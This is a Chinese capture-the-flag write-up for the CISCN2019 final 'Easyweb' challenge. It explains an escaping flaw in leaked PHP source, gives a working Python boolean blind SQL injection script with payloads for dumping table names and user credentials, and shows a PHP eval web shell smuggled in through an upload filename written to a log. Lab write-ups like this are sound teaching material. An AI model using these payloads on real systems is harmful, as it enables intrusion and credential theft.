CISCN2019 总决赛 Day2 Web1 Easyweb

扫后台找到robots.txt

提示了些信息：Disallow *.php.bak

访问image.php.bak

<?php
// Challenge source recovered from image.php.bak (see the write-up above).
// NOTE(review): the "sanitisation" below is the root cause of the injection
// this write-up uses. addslashes() escapes ' " \ and NUL with a backslash,
// but the str_replace() that follows deletes the two-character sequences
// \0 and \' again, which can remove the very backslash addslashes() just
// inserted and leave a bare backslash behind in $id (the write-up's
// id=\0 test shows exactly that). The fix is a prepared statement
// (mysqli_prepare + bind_param) instead of building the query by string
// interpolation; the filter list cannot be patched into safety.
include "config.php";

// Defaults when the parameters are absent: id=1, path="".
$id=isset($_GET["id"])?$_GET["id"]:"1";
$path=isset($_GET["path"])?$_GET["path"]:"";

// Step 1: backslash-escape quotes, backslashes and NUL.
$id=addslashes($id);
$path=addslashes($path);

// Step 2: strip \0, %00, \' and ' — this partly undoes step 1, because
// removing "\0" from an escaped "\\0" leaves a single unescaped backslash.
$id=str_replace(array("\\0","%00","\\'","'"),"",$id);
$path=str_replace(array("\\0","%00","\\'","'"),"",$path);

// Both values are interpolated straight into the SQL text.
$result=mysqli_query($con,"select * from images where id='{$id}' or path='{$path}'");
$row=mysqli_fetch_array($result,MYSQLI_ASSOC);

// The path column of whatever row the query matched decides which file is
// served. The write-up's script treats the presence of the JFIF marker in
// the response body as its boolean oracle (row matched vs. not matched).
$path="./" . $row["path"];
header("Content-Type: image/jpeg");
readfile($path);

测试:

测试 `?id=\0&path=or if(length(database())>1,3,1) %23`，访问成功。原因是 `\0` 经 addslashes 变成 `\\0`，随后 str_replace 又删掉 `\0`，只剩一个反斜杠，它转义了 `id='...'` 的闭合引号，于是 path 的内容直接进入 SQL；能否返回图片就成了布尔条件，又是得盲注了。

151.PNG

import time
import requests
import sys
import string
import logging


# LOG_FORMAT = "%(lineno)d - %(asctime)s - %(levelname)s - %(message)s"

# logging.basicConfig(level=logging.DEBUG, format=LOG_FORMAT)

# Challenge instance used in the write-up; the host is specific to that deployment.
_BASE_URL = "http://994977fa-91b0-48fe-92c8-1e029285d13a.node4.buuoj.cn/image.php"
# id=\0' is reduced to a lone backslash by the server's addslashes()+str_replace()
# pair (see image.php.bak above), which escapes the closing quote of id='...'
# and lets whatever follows in `path` land inside the SQL statement.
target = _BASE_URL + "?id=\\0'&path=or "

# Expression whose characters are extracted one position at a time. The
# write-up runs the script once per stage, swapping in the next expression:
#   database name -> "(database())"
#   table names   -> "(select(group_concat(table_name))from(information_schema.tables)where(table_schema)=database())"
#   column names  -> "(select(group_concat(column_name))from(information_schema.columns)where(table_name)=0x7573657273)"
#   row data      -> "(select(group_concat(username,password))from(users))"
# (0x7573657273 is the hex spelling of "users"; the write-up uses it because
# quotes are filtered by the server.)
dataStr = "(database())"
def binaryTest(i,cu,comparer):
    """Boolean oracle for one character position of the blind query.

    Appends ``ascii(substr(dataStr, i, 1)) <comparer> cu %23`` to the
    module-level ``target`` URL, issues one GET, and reports whether the
    server answered with a JPEG (the ``JFIF`` marker in the body), i.e.
    whether the comparison held. Every probe is a separate HTTP request
    with a near-identical query string, which is what makes this pattern
    stand out in a web server's access log.
    """
    probe = 'ascii(substr({},{},1)){comparer}{}%23'.format(
        dataStr, i, cu, comparer=comparer
    )
    response = requests.get(target + probe)
    return 'JFIF' in response.text


def searchFriends_sqli(i):
    """Recover the character at position ``i`` of the injected expression.

    Binary-searches the code range 0..255 using ``binaryTest`` as the
    comparison oracle (up to two requests per step). Returns the character,
    or ``None`` when the search lands on code 0 (``substr`` ran past the end
    of the string) or when the window closes without a match.
    """
    lo, hi = 0, 255
    while lo <= hi:
        mid = (lo + hi) // 2
        if binaryTest(i, mid, "<"):
            hi = mid - 1
            continue
        if binaryTest(i, mid, ">"):
            lo = mid + 1
            continue
        # Neither smaller nor larger: mid is the value itself.
        return None if mid == 0 else chr(mid)
    return None


def main():
    """Extract the expression one character at a time.

    Keeps calling ``searchFriends_sqli`` with increasing positions until it
    reports ``None`` (end of string), printing the partial result after each
    character and the full result at the end.
    """
    print("start")
    finres = ""
    position = 1
    while True:
        ch = searchFriends_sqli(position)
        if ch is None:
            break
        finres += ch
        position += 1
        print("(+) 当前结果:" + finres)
    print("(+) 运行完成,结果为:", finres)

# Only start the extraction when run as a script, not on import.
if __name__=="__main__":
    main()

别的大佬的脚本

这边爆出表名 users 后，要将其转为十六进制 0x7573657273 再使用，因为单引号、双引号都被过滤了

152.PNG

153.PNG

爆完数据后登入
上传文件，可以传入 .phtml

但是页面提示会将文件名写入日志文件中

155.PNG

那就可以

filename="<?= @eval($_POST['hack']); ?>"  

用短标签绕过

156.PNG

蚁剑连接一下就好了

154.PNG